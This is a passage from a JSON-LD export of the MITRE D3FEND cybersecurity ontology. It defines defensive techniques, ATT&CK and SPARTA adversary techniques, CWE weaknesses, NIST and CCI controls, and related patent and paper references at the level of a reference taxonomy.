      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20090077645A1"
      },
      "d3f:kb-abstract": "Methods, systems and machine-readable media for authenticating an end user for a client application are disclosed. According to one embodiment of the invention, a method of authenticating an end user for a client application using a directory service having an authentication control policy that tracks failed authentication attempts and allows lock out of an account after a predetermined number of failures comprises receiving end user identity information and security information at the client application; sending a search request to the directory service for an entry associated with the end user identity information and, if a match is found, receiving a authentication token from the directory service associated with the end user identity information; comparing the received authentication token with the security information; if the authentication token matches the security information, sending a request to update the directory service to indicate that successful authentication of the end user has occurred; and if the authentication token does not match the security information, sending a request to update the directory service to indicate that a failed attempt at authentication of the end user has occurred.",
      "d3f:kb-author": "Buddhika Nandana Kottahachchi",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Oracle International Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:kb-reference-title": "Framework for notifying a directory service of authentication events processed outside the directory service",
      "rdfs:label": "Reference - Framework for notifying a directory service of authentication events processed outside the directory service - Oracle International Corp"
    },
    {
      "@id": "d3f:T1624",
      "@type": "owl:Class",
      "d3f:attack-id": "T1624",
      "d3f:definition": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.",
      "rdfs:label": "Event Triggered Execution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Event Triggered Execution"
    },
    {
      "@id": "d3f:FileMetadataConsistencyValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileMetadataConsistencyValidation"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:FileContentBlockData"
        },
        {
          "@id": "d3f:FileMetadata"
        }
      ],
      "d3f:d3fend-id": "D3-FMCV",
      "d3f:definition": "The process of validating the consistency between a file's metadata and its actual content, ensuring that elements like declared lengths, pointers, and checksums accurately describe the file's content.",
      "d3f:kb-article": "## How it works\n\nThis technique involves validating the consistency between a file's metadata and its actual content. It checks elements like declared lengths, pointers, and checksums to ensure they accurately describe the file's content. For instance, if a header specifies a content block of 50 bytes, this should be verified, and CRC values should be recalculated and compared.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
      },
      "rdfs:label": "File Metadata Consistency Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:N655afa7f73324e1eb33f3a0ccbd7ca55"
        },
        {
          "@id": "_:N313d5c9b61e34889b4f7ff2da3759b86"
        }
      ]
    },
    {
      "@id": "_:N655afa7f73324e1eb33f3a0ccbd7ca55",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlockData"
      }
    },
    {
      "@id": "_:N313d5c9b61e34889b4f7ff2da3759b86",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:CWE-1390",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1390",
      "d3f:definition": "The product uses an authentication mechanism to restrict access to specific users or identities, but the mechanism does not sufficiently prove that the claimed identity is correct.",
      "rdfs:label": "Weak Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:VectorImageFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:VectorImage"
      },
      "d3f:definition": "A file that contains graphics data represented by vectors.",
      "rdfs:label": "Vector Image File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImageFile"
        },
        {
          "@id": "_:N70af7b40eff944ae8157e3d05f11e9dc"
        }
      ]
    },
    {
      "@id": "_:N70af7b40eff944ae8157e3d05f11e9dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VectorImage"
      }
    },
    {
      "@id": "d3f:BookReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Book",
      "rdfs:label": "Book Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:MotionDetector",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An electrical device that utilizes a sensor to detect nearby motion.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Motion_detector"
      },
      "rdfs:label": "Motion Detector",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Sensor"
        }
      ]
    },
    {
      "@id": "d3f:REC-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0007",
      "d3f:definition": "Adversaries watch for telltale signs that the spacecraft has entered a safed or survival configuration, typically sun-pointing or torque-limited attitude, reduced payload activity, conservative power/thermal setpoints, and low-rate engineering downlink. Indicators include specific mode bits or beacon fields, changes in modulation/coding and cadence, distinctive event packets (e.g., wheel unload aborts, brownout recovery), elevated heater duty, altered load-shed states, and operator behaviors such as emergency DSN requests, longer ground passes, or public anomaly notices. This reconnaissance helps time later actions to coincide with periods of reduced bandwidth, altered monitoring, or maintenance command availability. It may also reveal how safing affects authentication (e.g., whether rapid-response paths or recovery consoles differ from nominal).",
      "rdfs:label": "Monitor for Safe-Mode Indicators - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Monitor for Safe-Mode Indicators"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Audit Log Storage Capacity",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "AU-4"
    },
    {
      "@id": "d3f:Reference-SinkholingBadNetworkDomainsByRegisteringTheBadNetworkDomainsOnTheInternet_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160381065A1"
      },
      "d3f:kb-abstract": "Techniques for sinkholing bad network domains by registering the bad network domains on the Internet are provided. In some embodiments, sinkholing bad network domains by registering the bad network domains on the Internet includes determining a network domain is a bad network domain, in which the bad network domain is determined to be associated with an identified malware (e.g., malware that has been identified and has been determined to be associated with the bad domain), and the bad network domain is sinkholed by registering the bad network domain with a sinkholed IP address; and identifying a host that is infected with the identified malware based on an attempt by the host to connect to the sinkholed IP address.",
      "d3f:kb-author": "Huagang Xie; Wei Xu; Nir Zuk",
      "d3f:kb-mitre-analysis": "This patent describes a technique to identify bad domains that are associated with malware and sinkhole the bad domain. Bad domains are identified by receiving malware samples and executing the malware sample in a virtual execution environment to identify network domains that the malware sample attempts to connect to during execution. Network domains that are identified during malware execution are then generated into signatures to identity bad domains for other hosts. Once identified, the bad domains are sinkholed by translating the domain to a valid IP address that is associated with a device controlled by a cloud security provider.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Sinkholing bad network domains by registering the bad network domains on the internet",
      "rdfs:label": "Reference - Sinkholing bad network domains by registering the bad network domains on the internet - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:ScheduledJobAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ScheduledJobAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:JobSchedule"
      },
      "d3f:d3fend-id": "D3-SJA",
      "d3f:definition": "Analysis of source files, processes, destination files, or destination servers associated with a scheduled job to detect unauthorized use of job scheduling.",
      "d3f:kb-article": "## How it works\nScheduled job execution can be utilized by adversaries for the purpose of persistence, conducting remote execution, or gaining privileges. Details of a scheduled job such as associated source files, processes, destination files, or destination servers are first identified and analyzed and then compared against an anti-malware signature database, whitelist, or reputation server. For example, a file associated with a scheduled job to be executed at a specified time or a remote server that is accessed as part of a scheduled task is compared against an anti-malware signature database, whitelist, or reputation server, and if a match is found, execution is denied and an alert is generated.\n\nIn addition to traditional scheduled jobs, triggers can be set to execute a specific command after detecting a specific event in the system, such as with WMI Event Subscriptions in Windows.\n\n## Considerations\nJobs can be scheduled in many different and sometimes creative ways through operating system capabilities.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ExecutionWithAT_MITRE"
        },
        {
          "@id": "d3f:Reference-ExecutionWithSchtasks_MITRE"
        },
        {
          "@id": "d3f:Reference-PreventingExecutionOfTaskScheduledMalware_McAfeeLLC"
        }
      ],
      "d3f:synonym": "Scheduled Job Execution",
      "rdfs:label": "Scheduled Job Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N7b016c4554fe4eecafce461ed5b18f3e"
        }
      ]
    },
    {
      "@id": "_:N7b016c4554fe4eecafce461ed5b18f3e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "d3f:T1070",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070",
      "d3f:definition": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.",
      "rdfs:label": "Indicator Removal",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:WindowsNtAllocateVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtAllocateVirtualMemory routine reserves, commits, or both, a region of pages within the user-mode virtual address space of a specified process.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory"
      },
      "rdfs:label": "Windows NtAllocateVirtualMemory",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:RangeMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RM",
      "d3f:definition": "Numeric Range Matching determines if a value lies with an interval of values (i.e., within the range of values.)",
      "rdfs:label": "Range Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:NumericPatternMatching"
      }
    },
    {
      "@id": "d3f:T1053.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.001",
      "d3f:definition": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1053.002",
      "rdfs:label": "At (Linux) Execution",
      "rdfs:seeAlso": {
        "@id": "d3f:T1053.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_9",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:UserBehaviorAnalysis"
        }
      ],
      "d3f:control-name": "Least Privilege | Log Use of Privileged Functions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6(9)"
    },
    {
      "@id": "d3f:CCI-001067_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements privileged access authorization to organization-identified information system components for selected organization-defined vulnerability scanning activities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001067"
    },
    {
      "@id": "d3f:Process",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ProcessImage"
      },
      "d3f:definition": "A process is an instance of a computer program that is being executed. It contains the program code and its current activity. Depending on the operating system (OS), a process may be made up of multiple threads of execution that execute instructions concurrently. A computer program is a passive collection of instructions, while a process is the actual execution of those instructions. Several processes may be associated with the same program; for example, opening up several instances of the same program often means more than one process is being executed.",
      "d3f:instructed-by": {
        "@id": "d3f:Software"
      },
      "d3f:may-execute": {
        "@id": "d3f:Thread"
      },
      "d3f:process-image-path": {
        "@id": "d3f:ExecutableBinary"
      },
      "d3f:process-user": {
        "@id": "d3f:UserAccount"
      },
      "d3f:uses": {
        "@id": "d3f:Resource"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Process_(computing)"
      },
      "rdfs:label": "Process",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/process"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nc57908480533497fafe0a142ff3cf8f5"
        },
        {
          "@id": "_:N3b3a98eca8e94bf8acd63615db4987e6"
        },
        {
          "@id": "_:N71b5fbe283da4a4f94ec8ae5e5f00753"
        },
        {
          "@id": "_:N7a99f8068c3a4f8ebb83c7993d0bd325"
        },
        {
          "@id": "_:N698c881594e64b98a4e56d9ae43defb6"
        },
        {
          "@id": "_:N670ed86b3d614e1ebb9fd1c62506164f"
        },
        {
          "@id": "_:N25268f8e54c44e789c3987b8e3e218f7"
        },
        {
          "@id": "_:Na3c2b2a284404829b3b013999f65a6c7"
        },
        {
          "@id": "_:N0c262933ef6f49f09e33dd4b16073d88"
        },
        {
          "@id": "_:N87d3fdd0a5e5456b80c63de5ec8981fb"
        }
      ]
    },
    {
      "@id": "_:Nc57908480533497fafe0a142ff3cf8f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessImage"
      }
    },
    {
      "@id": "_:N3b3a98eca8e94bf8acd63615db4987e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:N71b5fbe283da4a4f94ec8ae5e5f00753",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-execute"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "_:N7a99f8068c3a4f8ebb83c7993d0bd325",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-image-path"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:N698c881594e64b98a4e56d9ae43defb6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-user"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N670ed86b3d614e1ebb9fd1c62506164f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "_:N25268f8e54c44e789c3987b8e3e218f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-command-line-arguments"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:Na3c2b2a284404829b3b013999f65a6c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-environmental-variables"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:N0c262933ef6f49f09e33dd4b16073d88",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-identifier"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:integer"
      }
    },
    {
      "@id": "_:N87d3fdd0a5e5456b80c63de5ec8981fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-security-context"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:SPARTAReconnaissanceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0001"
      },
      "rdfs:label": "Reconnaissance Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Nff1642aa34154d77b3f3dfdc22c77d82"
        }
      ],
      "skos:prefLabel": "Reconnaissance Technique"
    },
    {
      "@id": "_:Nff1642aa34154d77b3f3dfdc22c77d82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0001"
      }
    },
    {
      "@id": "d3f:IA-0001.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001.02",
      "d3f:definition": "Here the manipulation targets software delivered to flight or ground systems: altering source before build, swapping signed binaries at distribution edges, subverting update metadata, or using stolen signing keys to issue malicious patches. Space-specific vectors include mission control applications, schedulers, gateway services, flight tables and configuration packages, and firmware loads during I&T or LEOP. Adversaries craft payloads that pass superficial validation, trigger under particular operating modes, or reintroduce known weaknesses through version rollback. “Data payloads” such as malformed tables, ephemerides, or calibration products can double as exploits when parsers are permissive. The objective is to ride the normal promotion pipeline so the implant arrives pre-trusted and executes as part of routine operations.",
      "rdfs:label": "Software Supply Chain - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0001"
      },
      "skos:prefLabel": "Software Supply Chain"
    },
    {
      "@id": "d3f:CCI-002723_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, upon detection of a potential integrity violation, provides the capability to audit the event.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002723"
    },
    {
      "@id": "d3f:label",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "label"
      },
      "rdfs:subPropertyOf": {
        "@id": "rdfs:label"
      }
    },
    {
      "@id": "d3f:CWE-577",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-577",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using sockets.",
      "rdfs:label": "EJB Bad Practices: Use of Sockets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:Reference-Testing_Metrics_for_Password_Creation_Policies_by_Attacking_Large_Sets_of_Revealed_Passwords",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cs.umd.edu/~jkatz/security/downloads/passwords_revealed-weir.pdf"
      },
      "d3f:kb-author": "Matt Weir, Sudhir Aggarwal, Michael Collins, Henry Stern",
      "d3f:kb-reference-of": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:kb-reference-title": "Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords",
      "rdfs:label": "Reference - Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords"
    },
    {
      "@id": "d3f:Reference-PasswordandKeyRotation-SSH",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ssh.com/academy/iam/password-key-rotation"
      },
      "d3f:kb-organization": "SSH",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:CertificateRotation"
        },
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "d3f:PasswordRotation"
        }
      ],
      "d3f:kb-reference-title": "Password and Key Rotation",
      "rdfs:label": "Reference - Password and Key Rotation - SSH"
    },
    {
      "@id": "d3f:FullVolumeSnapshot",
      "@type": "owl:Class",
      "d3f:definition": "A full volume snapshot is a point-in-time copy of the complete contents of a volume.",
      "rdfs:label": "Full Volume Snapshot",
      "rdfs:seeAlso": {
        "@id": "https://aws.amazon.com/compare/the-difference-between-incremental-differential-and-other-backups/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:VolumeSnapshot"
      }
    },
    {
      "@id": "d3f:CWE-281",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-281",
      "d3f:definition": "The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.",
      "rdfs:label": "Improper Preservation of Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:OTDeviceDescriptionMessage",
      "@type": "owl:Class",
      "d3f:definition": "Describe features, abilities, or performance of system components.",
      "rdfs:comment": [
        "ENIP: List Services\nENIP: List Interfaces ",
        "GE-SRTP: RETURN CONTROL PROGRAM NAMES\nGE-SRTP: RETURN CONTROLLER TYPE AND ID INFORMATION"
      ],
      "rdfs:label": "OT Device Description Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:T1498.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1498.001",
      "d3f:creates": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "d3f:definition": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.",
      "rdfs:label": "Direct Network Flood",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1498"
        },
        {
          "@id": "_:Nbb728a4d25e14fc2b50d0b8e27ae402f"
        }
      ]
    },
    {
      "@id": "_:Nbb728a4d25e14fc2b50d0b8e27ae402f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:DomainUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A domain user account in Microsoft Windows (2000) defines that user's access to a logical group of network objects (computers, users, devices) that share the same Active Directory databases; that is, a user's access to a domain.",
      "rdfs:label": "Domain User Account",
      "rdfs:seeAlso": {
        "@id": "https://networkencyclopedia.com/global-user-account"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:EmbeddedComputer",
      "@type": "owl:Class",
      "d3f:definition": "An embedded computer is a computer system -- a combination of a computer processor, computer memory, and input/output peripheral devices-that has a dedicated function within a larger mechanical or electrical system. It is embedded as part of a complete device often including electrical or electronic hardware and mechanical parts. Because an embedded system typically controls physical operations of the machine that it is embedded within, it often has real-time computing constraints. Embedded systems control many devices in common use today. Ninety-eight percent of all microprocessors manufactured are used in embedded systems.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Embedded_system"
      },
      "rdfs:label": "Embedded Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:ClientComputer"
      },
      "skos:altLabel": "Embedded System"
    },
    {
      "@id": "d3f:CCI-001150_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prohibits remote activation of collaborative computing devices, excluding the organization-defined exceptions where remote activation is to be allowed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001150"
    },
    {
      "@id": "d3f:D3FENDCore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "D3FEND Core"
    },
    {
      "@id": "d3f:impairs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x impairs y: The entity or action x hinders entity y by reducing its normal function, capacity, or availability.",
      "rdfs:label": "impairs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:SystemConfigurationInitResource",
      "@type": "owl:Class",
      "d3f:definition": "A system configuration initialization resource has information for initializing (booting) a system.",
      "rdfs:label": "System Configuration Init Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:LocalResource"
      },
      "skos:altLabel": "System Init Resource"
    },
    {
      "@id": "d3f:T1065",
      "@type": "owl:Class",
      "d3f:attack-id": "T1065",
      "d3f:definition": "Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1571",
      "rdfs:label": "Uncommonly Used Port",
      "rdfs:seeAlso": {
        "@id": "d3f:T1571"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:RegOpenKeyW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyW"
    },
    {
      "@id": "d3f:CCI-002460_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined actions prior to executing mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002460"
    },
    {
      "@id": "d3f:T1629.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629.002",
      "d3f:definition": "An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using `DevicePolicyManager.lockNow()`. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018)",
      "rdfs:label": "Device Lockout - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1629"
      },
      "skos:prefLabel": "Device Lockout"
    },
    {
      "@id": "d3f:CloudConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information used to configure the services, parameters, and initial settings for a virtual server instance running in a cloud service.",
      "rdfs:label": "Cloud Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      },
      "skos:altLabel": "Cloud Configuration Information"
    },
    {
      "@id": "d3f:PER-0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "PER-0005",
      "d3f:definition": "Threat actors may acquire or leverage valid credentials to maintain persistent access to a spacecraft or its supporting command and control (C2) systems. These credentials may include system service accounts, user accounts, maintenance access credentials, cryptographic keys, or other authentication mechanisms that enable continued entry without triggering access alarms. By operating with legitimate credentials, adversaries can sustain access over extended periods, evade detection, and facilitate follow-on tactics such as command execution, data exfiltration, or lateral movement. Credentialed persistence is particularly effective in environments lacking strong credential lifecycle management, segmentation, or monitoring allowing threat actors to exploit trusted pathways while remaining embedded in mission operations.",
      "d3f:uses": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credentialed Persistence - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0005/"
      },
